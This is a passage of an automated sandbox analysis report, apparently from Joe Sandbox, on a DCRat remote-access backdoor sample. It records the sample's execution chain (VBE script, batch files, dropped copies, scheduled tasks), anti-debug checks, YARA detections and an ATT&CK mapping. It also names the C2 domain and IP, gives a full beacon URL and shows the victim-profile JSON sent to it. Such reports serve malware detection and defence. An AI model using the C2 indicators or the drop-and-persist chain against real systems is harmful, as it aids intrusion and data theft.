            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595229Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594576Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594249Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594113Jump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\userJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: wscript.exe, 00000002.00000003.2186669281.000000000336D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: portperf.exe, 00000006.00000002.2229539547.000000001B9DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: DCRatBuild.exe, dfVXJbANbh.exe4.6.dr, dfVXJbANbh.exe5.6.dr, dfVXJbANbh.exe3.6.dr, dfVXJbANbh.exe2.6.dr, dfVXJbANbh.exe.6.dr, dfVXJbANbh.exe0.6.dr, RuntimeBroker.exe.6.dr, dfVXJbANbh.exe1.6.dr, portperf.exe.0.dr, System.exe.6.drBinary or memory string: DyanhGfst51QiCfKYHj
            Source: wscript.exe, 00000002.00000003.2186669281.000000000336D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
            Source: portperf.exe, 00000006.00000002.2229539547.000000001B9DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: w32tm.exe, 00000029.00000002.2273043211.0000019E84C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: dfVXJbANbh.exe, 00000014.00000002.3406569618.000000001B590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
            Source: C:\Users\user\Desktop\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_0-23351
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8866F
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8753D mov eax, dword ptr fs:[00000030h]0_2_00D8753D
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8B710 GetProcessHeap,0_2_00D8B710
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess token adjusted: Debug
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7F063 SetUnhandledExceptionFilter,0_2_00D7F063
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D7F22B
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8866F
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D7EF05
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBlocksurrogateagentFont\portperf.exe "C:\ChainBlocksurrogateagentFont\portperf.exe"Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: merica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}H;
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: merica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}P
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7ED5B cpuid 0_2_00D7ED5B
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D7A63C
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeQueries volume information: C:\ChainBlocksurrogateagentFont\portperf.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe VolumeInformationJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeQueries volume information: C:\Users\Default\Videos\dfVXJbANbh.exe VolumeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeQueries volume information: C:\Program Files\7-Zip\Lang\System.exe VolumeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeQueries volume information: C:\Program Files\7-Zip\Lang\System.exe VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D7D5D4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6ACF5 GetVersionExW,0_2_00D6ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dfVXJbANbh.exe PID: 7248, type: MEMORYSTR
            Source: Yara matchFile source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: portperf.exe PID: 3968, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dfVXJbANbh.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 7308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 7336, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dfVXJbANbh.exe PID: 7248, type: MEMORYSTR
            Source: Yara matchFile source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: portperf.exe PID: 3968, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dfVXJbANbh.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 7308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 7336, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		12
            Process Injection            		23
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory221
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Native API            		Login HookLogin Hook12
            Process Injection            		NTDS131
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture112
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSync137
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561293 Sample: DCRatBuild.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 59 cy98085.tw1.ru 2->59 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Antivirus detection for dropped file 2->65 67 14 other signatures 2->67 11 DCRatBuild.exe 3 6 2->11         started        14 dfVXJbANbh.exe 2->14         started        17 dfVXJbANbh.exe 14 2 2->17         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 45 C:\...\portperf.exe, PE32 11->45 dropped 47 C:\...\IQYI1ZQqki4.vbe, data 11->47 dropped 22 wscript.exe 1 11->22         started        79 Multi AV Scanner detection for dropped file 14->79 57 cy98085.tw1.ru 185.114.245.123, 49723, 49729, 49730 TIMEWEB-ASRU Russian Federation 17->57 file6 signatures7 process8 signatures9 69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->69 25 cmd.exe 1 22->25         started        process10 process11 27 portperf.exe 3 24 25->27         started        31 conhost.exe 25->31         started        file12 49 C:\Windows\SystemTemp\...\RuntimeBroker.exe, PE32 27->49 dropped 51 C:\Users\Public\Music\dfVXJbANbh.exe, PE32 27->51 dropped 53 C:\Users\Default\Videos\dfVXJbANbh.exe, PE32 27->53 dropped 55 7 other malicious files 27->55 dropped 71 Antivirus detection for dropped file 27->71 73 Multi AV Scanner detection for dropped file 27->73 75 Machine Learning detection for dropped file 27->75 77 2 other signatures 27->77 33 cmd.exe 27->33         started        35 schtasks.exe 27->35         started        37 schtasks.exe 27->37         started        39 25 other processes 27->39 signatures13 process14 process15 41 conhost.exe 33->41         started        43 w32tm.exe 33->43         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DCRatBuild.exe63%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            DCRatBuild.exe55%VirustotalBrowse
            DCRatBuild.exe100%AviraVBS/Runner.VPG
            DCRatBuild.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe100%AviraVBS/Runner.VPG
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\portperf.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat100%AviraBAT/Delbat.C
            C:\Program Files\7-Zip\Lang\System.exe100%AviraHEUR/AGEN.1323984
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\portperf.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Lang\System.exe100%Joe Sandbox ML
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ChainBlocksurrogateagentFont\portperf.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\7-Zip\Lang\System.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\Videos\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\Music\dfVXJbANbh.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://cy98085.tw1.ru/0%Avira URL Cloudsafe
            http://cy98085.tw1.ru0%Avira URL Cloudsafe
            http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W0%Avira URL Cloudsafe
